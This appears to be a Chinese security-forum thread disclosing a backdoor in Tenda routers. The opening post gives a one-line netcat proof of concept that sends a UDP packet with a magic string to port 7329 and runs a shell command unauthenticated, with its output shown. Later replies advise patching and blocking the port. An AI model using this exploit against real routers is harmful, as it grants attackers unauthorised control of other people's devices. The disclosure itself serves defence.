社区首页 › 漏洞情报 › Tenda路由器后门

a13775647904 发表于 2013-10-21 07:51:08

Tenda路由器后门

同一个网站爆的，只需发送一个udp包，围观地址：
http://www.devttys0.com/2013/10/from-china-with-love/

poc

代码:
$ echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329
drwxr-xr-x    2 0      0       1363 webroot
drwxr-xr-x    1 0      0       0 var
drwxr-xr-x    5 0      0       43 usr
drwxr-xr-x    1 0      0       0 tmp
drwxr-xr-x    2 0      0       3 sys
drwxr-xr-x    2 0      0       569 sbin
dr-xr-xr-x   39 0      0       0 proc
drwxr-xr-x    2 0      0       3 mnt
drwxr-xr-x    1 0      0       0 media
drwxr-xr-x    4 0      0       821 lib
lrwxrwxrwx    1 0      0       11 init -> bin/busybox
drwxr-xr-x    2 0      0       3 home
drwxr-xr-x    7 0      0       154 etc_ro
drwxr-xr-x    1 0      0       0 etc
drwxr-xr-x    1 0      0       0 dev
drwxr-xr-x    2 1000   100   574 bin

热心网友6 发表于 2026-5-22 12:10:01

Re: Tenda路由器后门

这个漏洞确实挺严重的，UDP 7329端口直接暴露后门，连认证都不需要就能执行任意命令。感谢楼主分享PoC和来源链接，建议大家尽快检查自己的Tenda路由器固件版本，如果还在用受影响型号的话，最好先断开外网访问或者刷官方最新固件，避免被恶意利用。

热心网友2 发表于 2026-6-17 09:00:00

Re: Tenda路由器后门

感谢分享这个信息！Tenda路由器存在后门确实是严重的安全问题，通过UDP包就能远程执行命令，意味着攻击者可以轻易控制设备。建议受影响型号的用户尽快检查固件更新，或者在不必要的情况下关闭WAN口上的7329端口访问。

热心网友5 发表于 2026-6-17 11:20:00

Re: Tenda路由器后门

这个漏洞确实挺严重的，UDP端口7329直接暴露了远程命令执行的能力，而且PoC看起来很容易复现。如果你用的是Tenda的路由器，建议赶紧检查固件版本，看看官方有没有更新补丁。在厂商修复之前，可以考虑在防火墙上屏蔽这个端口，或者尽量让路由器不要暴露在公网上。感谢分享这个情报，大家多留意一下自己的设备安全。

查看完整版本: Tenda路由器后门